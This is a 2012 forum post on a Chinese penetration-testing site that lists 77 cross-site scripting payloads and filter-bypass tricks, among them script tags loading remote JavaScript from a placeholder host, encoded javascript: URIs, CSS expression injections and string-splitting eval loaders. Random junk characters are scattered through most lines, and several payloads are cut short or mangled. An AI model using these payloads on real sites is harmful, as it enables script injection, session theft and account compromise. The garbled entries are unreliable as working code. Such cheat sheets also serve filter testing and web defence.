中国网络渗透测试联盟

标题: xss跨站脚本攻击汇总 [打印本页]
作者: admin    时间: 2012-9-5 14:56
标题: xss跨站脚本攻击汇总
貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。" i1 r: u* s4 A) H/ W$ e- q
! t: |- a7 D  c7 S- ?/ ~2 r
(1)普通的XSS JavaScript注入; D9 S! E( X- \6 T* e
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
0 v) u9 n" r$ P5 q6 y4 A
- g: G9 z* Q+ r0 V# m3 n0 b (2)IMG标签XSS使用JavaScript命令
: Y- Y) v4 d0 Q, c" i& T <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>8 b  x& o7 v+ |! Z( y. \

: Q- @: r9 r7 U5 e7 S9 j; G2 k (3)IMG标签无分号无引号; V/ {. N* X7 M" S
<IMG SRC=javascript:alert(‘XSS’)>
/ \3 \; d& O  L" E3 {$ [% H
$ |3 [  L" C; x (4)IMG标签大小写不敏感8 ?2 h% u# A- Y: O0 X$ s
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
; ]. V8 o2 W7 P# d. N/ }8 t
; w  A: ~/ {, r6 } (5)HTML编码(必须有分号)+ |: a4 I4 m+ h2 o4 n
<IMG SRC=javascript:alert(“XSS”)>
! F" ]* Y2 K  a; R, e3 k& H& T+ C  U$ }$ F# ]/ j
(6)修正缺陷IMG标签
6 s  ~( S7 C5 o8 C <IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
# e8 D; y( r. ~' }; I6 P: P* y6 L/ w% r/ r* q8 D* T& U% w
(7)formCharCode标签(计算器)
* }# W/ p$ ~; ]# b7 x <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>3 D& {3 k9 ]! A' C, C7 I! I9 ~+ y
" F: a0 d9 ^( x8 n/ y
(8)UTF-8的Unicode编码(计算器)! Z5 |% l4 p7 E7 m: V8 C7 L% @8 g
<IMG SRC=jav..省略..S')>' q. K: w3 d1 k* x

) x6 b1 G6 y: `0 K5 o& w (9)7位的UTF-8的Unicode编码是没有分号的(计算器)1 {( e, a5 C% `
<IMG SRC=jav..省略..S')>. G. z! [: v! O

; J6 w) V5 M5 N6 u) y (10)十六进制编码也是没有分号(计算器)
5 q6 o6 V: e, s: T <IMG SRC=&#x6A&#x61&#x76&#x61..省略..&#x58&#x53&#x53&#x27&#x29>
3 ~' `# }# n4 u3 z% L% q. b9 G! \
(11)嵌入式标签,将Javascript分开
* |% ^; u2 D1 Q; l& h <IMG SRC=”jav ascript:alert(‘XSS’);”>2 N' g% s- Y  L9 y4 k2 W

- I& {1 y) G, t( N: U+ P  o (12)嵌入式编码标签,将Javascript分开# h: f4 s' _; M/ G  o' k
<IMG SRC=”jav ascript:alert(‘XSS’);”>1 B+ }, v7 t, E! P) A! W' t

$ ?- G: N3 P# c; c! P (13)嵌入式换行符
/ ?$ T& n' U- ?, Y <IMG SRC=”jav ascript:alert(‘XSS’);”>
% Y% W' {- q2 k& a! O
* w6 p2 @% F# o, W (14)嵌入式回车
% o1 M1 I+ a4 L, S4 N/ d8 C7 ^' T <IMG SRC=”jav ascript:alert(‘XSS’);”>6 S0 J" |1 D+ y# E9 i2 L

3 [/ t: J0 i' M$ T (15)嵌入式多行注入JavaScript,这是XSS极端的例子) w- {1 Z- H0 P  E
<IMG SRC=”javascript:alert(‘XSS‘)”>7 w% F- D8 ?" y6 m6 Z+ P0 `5 h

7 C+ v; s1 T; k( w (16)解决限制字符(要求同页面)' Q! X# s; v* |6 G# E  h% y+ ~5 I  v
<script>z=’document.’</script>
& x/ O4 @0 Z( V* `& R+ P0 V4 b/ R <script>z=z+’write(“‘</script>
* f6 R% i, x: G/ C, }' ]6 l6 i9 | <script>z=z+’<script’</script>/ G& W& e( H+ O2 s# m
<script>z=z+’ src=ht’</script>3 G4 T% |) h& ]/ e# a' J5 ^: }
<script>z=z+’tp://ww’</script>
- F2 _0 a6 G- O, V7 z2 Q! m <script>z=z+’w.shell’</script>
6 ^- V3 G5 _$ i# s- v+ h <script>z=z+’.net/1.’</script>
" ~' K( J9 b* j; ` <script>z=z+’js></sc’</script>+ w! K! D$ \  ]
<script>z=z+’ript>”)’</script>
4 L0 @8 N/ i/ E <script>eval_r(z)</script>+ u5 u- S9 `0 `8 W8 x4 T" K
# d/ |" Q, C9 v+ G" v
(17)空字符
4 k$ \0 @# Z8 D" P- O9 Q1 z perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
- l  t+ Q" O- {" D2 i* x3 h
0 Y6 W$ ^/ G# A; Z% G2 m% H (18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
, H/ o) ?) s3 M- v- [  O  q( m perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
6 y( a2 u! x( u8 t7 q# ^& b( q3 v/ l# q; [7 I
(19)Spaces和meta前的IMG标签
% Z$ v: d& c& J( J/ y4 c2 b <IMG SRC=”   javascript:alert(‘XSS’);”>
. D1 d7 X- Q: N- W/ D% }/ [' J& {) Q. N& {! V5 L7 M
(20)Non-alpha-non-digit XSS
8 _7 \4 a  a/ K <SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
  M% a% z' f* W, D, A; b' f* X+ f9 L( x. V: h& G% l
(21)Non-alpha-non-digit XSS to 2
6 X9 T# f( [7 e$ R* H) g/ R& v <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>% p0 D7 {% o" b- ]& I3 t
1 `/ C0 H, O; r! X
(22)Non-alpha-non-digit XSS to 3
4 l  m0 j! \% P <SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
  Q0 u3 ?: ?- V# C4 l# R1 _9 m' o2 x5 q( `: o) P6 v) J/ F- k
(23)双开括号# y( {0 X1 w3 @" ?/ Z! L
<<SCRIPT>alert(“XSS”);//<</SCRIPT>4 x/ Z* ?7 P+ G

1 K8 G: g5 E$ O2 j. y (24)无结束脚本标记(仅火狐等浏览器)' q  V% C* i9 J8 o' W6 `5 ~% A
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>/ e! K- @" W+ q0 K' @1 }) o

0 w7 u# Z7 Y+ d2 [. { (25)无结束脚本标记2
2 \* [5 O& s! X6 Z  T% @ <SCRIPT SRC=//3w.org/XSS/xss.js>
+ ]9 |2 z/ Q  V# |* d* y
, e+ E" M  e3 W, X6 a2 [! W6 H. g (26)半开的HTML/JavaScript XSS! _* j# m8 u. C
<IMG SRC=”javascript:alert(‘XSS’)”
! D' t, B+ S% J  L* s  O1 a4 [" k& d0 E4 }4 s/ ?+ f2 f( ^
(27)双开角括号; E' k! q4 i7 ]3 `1 i* @* ~3 S! t
<iframe src=http://3w.org/XSS.html <
2 s5 D, _) ]" Y' I. S+ {* q; I/ m4 r) |
(28)无单引号 双引号 分号2 h1 G2 v0 p5 h6 F6 Y5 E0 E3 m
<SCRIPT>a=/XSS/: G, }, D) K2 X9 ]! k# o1 v* i7 _) c
alert(a.source)</SCRIPT>
: ^# @  r! [2 D$ |& h2 q# e9 F% P
(29)换码过滤的JavaScript' J- r& b# v, o. m1 C* ?
\”;alert(‘XSS’);//
0 J. Z) D6 k# q3 N# K5 x% v  ~- N1 a6 w( @0 N3 z8 D
(30)结束Title标签
) Q7 g8 l) y8 ^3 n0 ~/ f" j </TITLE><SCRIPT>alert(“XSS”);</SCRIPT>7 {, p  T1 ^+ }& |6 R% _, q; P  Y
- b$ N5 H. `/ }6 l# [
(31)Input Image
5 U- f1 p0 a6 d% _7 g0 ] <INPUT SRC=”javascript:alert(‘XSS’);”>) Y. p/ U( c% n' t# J

8 M" v% ]0 _0 a3 L! x (32)BODY Image
; k# k8 H9 J( E% h4 q <BODY BACKGROUND=”javascript:alert(‘XSS’)”>
' ~2 S* H0 T: A/ c* P  I8 [8 W/ N+ h* n# N, x( u
(33)BODY标签
, _& Z5 Z" x+ A/ d <BODY(‘XSS’)>9 l. y2 N0 P( E& `0 U5 z2 `

! y4 o$ _8 @* t4 N  C" k (34)IMG Dynsrc
+ W6 h* m$ C+ ^% J <IMG DYNSRC=”javascript:alert(‘XSS’)”>
2 C2 H0 b$ M5 m8 h" X- l7 V" _
9 P* Z) J* e* ^" Q# R9 { (35)IMG Lowsrc
$ t5 @3 n1 l4 u. t2 f( I+ w <IMG LOWSRC=”javascript:alert(‘XSS’)”>' r8 I" J- X8 z% o: E# F' }' a

3 x& x) b2 m9 A8 k8 l" w( Z (36)BGSOUND1 H1 z* K1 H; {6 N
<BGSOUND SRC=”javascript:alert(‘XSS’);”>! C/ m! {3 F! H* x

: b: |. u* Q  Q( W4 `4 d. ` (37)STYLE sheet
; d9 I6 j1 X& u1 M! h/ x <LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
6 }. p# R# P- |: `2 Y1 V4 d8 h$ H
(38)远程样式表  C1 E2 _0 Z& e
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
! m3 I; f( s! @9 S+ ^7 e- ]3 q, K9 j! b  |9 \, J: _
(39)List-style-image(列表式)
+ a/ P1 q/ W* M# D1 [: d! _1 Q+ J <STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS, B$ B7 I+ y6 w3 E) \, A* O

8 @3 W- [9 S; E; r (40)IMG VBscript" u! O0 R: w6 a! ]
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS. _8 z5 g; g- i. W. q" q9 t
5 f/ }! _4 O  O. b  u
(41)META链接url5 x+ R& K# \' _+ K+ q" w
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>2 m3 G: o& M+ l9 w
3 B$ N8 z( R4 {$ A
(42)Iframe
, |; c" T% D$ y2 H  n8 V/ e4 I; v% O <IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>" o, g: U# ?! P7 u  b
$ C: A. X/ g, i
(43)Frame% q* K* p+ H% `, v4 J0 Y
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
, D+ d" [* a: o) }: l! _
% y  I! d1 L# X: u2 m; a( d# z. [ (44)Table6 ^/ Q' d1 B( O0 v9 h
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
' y! G& u) z! {! T) K, ^$ R5 d( A" [- u. X
(45)TD
. ~% X4 Z. z- _0 q <TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>2 K' z5 P. j5 w
; {& F4 q" |" o/ I
(46)DIV background-image- @9 W3 [$ T2 }; d  O
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
5 ^4 o7 T% m6 I# x* M
6 z! r) D& U. ]; `9 Z7 f7 T (47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)5 D0 i" V$ j0 B% }  O3 D- |& M& ?. L
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
; g& F6 U. X/ T& g0 n* q9 m+ c/ ]9 P0 z  b& q- u
(48)DIV expression4 |  C& m7 |. l; j5 l8 ~
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
" j+ Y: W1 D" I, ~. B0 {$ T5 j. k* n
(49)STYLE属性分拆表达
6 c; P4 H, x8 q! z' w  k <IMG STYLE=”xss:expression_r(alert(‘XSS’))”>3 [. Z* J; P, c/ H

/ l( y: X( m8 r& H. _ (50)匿名STYLE(组成:开角号和一个字母开头)
* z% M0 X* J% r# P* D+ }: K0 g <XSS STYLE=”xss:expression_r(alert(‘XSS’))”>0 Z- {" l) C3 y* N% u

: y) b' H4 s4 b  \ (51)STYLE background-image
. l# z& m* Y6 s% o <STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
3 `0 W) f' }0 @" Q" g
: o# s, O5 Z# o. M% y (52)IMG STYLE方式% p. T: w# h* Z3 V1 @4 s- P
exppression(alert(“XSS”))’>0 B3 C6 y, I& v: t

) N1 W6 o" J3 f' n& k; \: G7 h (53)STYLE background/ N8 Z# J4 }# x6 }: F/ `
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
6 Y3 c. N' z' a& e* n
& l* S' V/ s: K (54)BASE7 b9 e6 N7 c& Z% h2 X* T/ o+ m
<BASE HREF=”javascript:alert(‘XSS’);//”>
8 E- Y4 L5 {- N  V) b3 q$ S$ r: a8 l6 b, l
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS. `4 ^. n- g  V4 \* l, }' W
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
: ]# s% C0 [* `9 |9 V5 Z/ P, A; m0 O- a, q4 q
(56)在flash中使用ActionScrpt可以混进你XSS的代码: T/ c' V/ a; ?0 A# Z: B2 I
a=”get”;8 L( Q: a5 n0 z1 ?; K
b=”URL(\”";
( S  ]: t5 P# l& [: T5 v& Q7 v1 {5 Z c=”javascript:”;6 V2 R: c8 t$ N) R  u: h2 @5 `
d=”alert(‘XSS’);\”)”;5 _2 q& A  ?7 o2 j* M
eval_r(a+b+c+d);& O& ~% |0 M; W* q

4 h9 W6 O/ s7 G3 i. z% W- y (57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
- ~- c8 G# C3 r. f0 H <HTML xmlns:xss>
9 X0 g0 N8 D4 g9 w <?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>! b: S6 c, F% T
<xss:xss>XSS</xss:xss>0 B2 C# p/ |8 O, D7 N% k" W7 [7 s
</HTML>
( N2 F" ?! }1 ?! p3 f- }
( R" x( z' {. F6 v/ ] (58)如果过滤了你的JS你可以在图片里添加JS代码来利用* u6 V" c2 f: H6 p% z& ^2 f) B8 R# u
<SCRIPT SRC=””></SCRIPT>
& T" _3 @. \9 a+ m
3 U; U6 S. B  n4 A3 }/ ? (59)IMG嵌入式命令,可执行任意命令
* _# p' g1 K, M( m <IMG SRC=”http://www.XXX.com/a.php?a=b”>
* g6 C. h! o6 r) Z
1 Q8 J% k( o6 ? (60)IMG嵌入式命令(a.jpg在同服务器)
" `: r) u  y5 V Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser1 n& N5 f1 h5 v( m, s
& m' _, p, p, ^8 d
(61)绕符号过滤
" W7 y' q/ g2 p7 I2 n( F% x <SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
+ J3 _) v5 C5 t5 M6 }6 @: H- k6 n' r2 {) w2 G! I3 V
(62)$ C. C3 d' E. r
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>1 @) n4 F! h3 k; {: l

$ K" u2 t( \: f" @  s" C (63)
% J, Q6 ?& F0 }7 d' \# { <SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>4 \, O( c: e; c' _* \( R

6 R) q' N7 s, y& u5 ] (64)& e: m- u" p7 ^, ~2 {* P) ]3 @$ _
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
4 Z# y# k2 V  N9 {8 T, Z/ h) q
) k8 x0 n- r- `3 V) v- `- F) T (65)3 Q! D# l  I! e. ~, M7 _$ `0 w) Z% g
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
" ?! }1 T/ K7 P1 n. p2 R8 H; g2 H- X! V* L
(66)
' R! o; G0 d3 A2 P$ I! n <SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
5 @! z$ ^/ M7 p4 g) E% S
, j8 u0 d1 b6 o (67)
* }. n, g+ u0 v$ @8 A% Q <SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>
9 o9 m( g! r' m% y6 f7 o+ c
( y' q/ X. u2 X) i1 K (68)URL绕行7 k5 p8 [1 g8 r( p0 j+ f+ N/ K
<A HREF=”http://127.0.0.1/”>XSS</A>' J% i/ h$ r$ b7 u/ Y  k! z0 V
. m# W7 ~3 u; f* R3 D$ V5 w& ?
(69)URL编码) `. P9 H, Q6 d2 P) d
<A HREF=”http://3w.org”>XSS</A>
( \3 a- d1 {; U- @# V5 Y
: T" S8 n  @- I& r (70)IP十进制; M7 S, B' ~& I  g( N# W; A
<A HREF=”http://3232235521″>XSS</A>  Q8 t/ H: D1 U9 V0 C  ]

+ o! g1 b1 O8 W$ I3 h1 T (71)IP十六进制
" }9 v% u  b7 | <A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>  i3 L. S$ x6 Z* S
8 @& r9 t# P; c: j5 a; [' N$ c
(72)IP八进制
; Y9 c- H0 ^& H <A HREF=”http://0300.0250.0000.0001″>XSS</A>
7 D5 n5 i; w1 ~0 }5 }, \$ C: t& w! ?. y& S. Y: v( i
(73)混合编码. R9 W7 @8 l+ C2 o5 x3 h, R! G% F
<A HREF=”h
* U/ t1 n  z4 X! Y6 ]& d tt p://6 6.000146.0×7.147/”">XSS</A>* A- X, I- C4 E5 V
& c3 w' C+ [' H0 Y. U  l6 W! S9 l
(74)节省[http:]2 j/ x8 A6 {9 _, c
<A HREF=”//www.google.com/”>XSS</A>3 H! u% Q. N( u* [

" D0 w9 b) o: F (75)节省[www]
/ K& z6 m; A* C' b' z <A HREF=”http://google.com/”>XSS</A>
5 g$ Z: {( _3 v* x' H1 s3 Z. C0 ]# Q& P3 r- `. p7 g
(76)绝对点绝对DNS
/ N$ K. e$ f3 x <A HREF=”http://www.google.com./”>XSS</A>
8 _" t" _1 h: b1 W2 M+ w6 Q7 T* I% C3 B6 O8 `& x# C" B4 f
(77)javascript链接
8 j4 D7 |- {/ O9 D9 o# G, x <A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2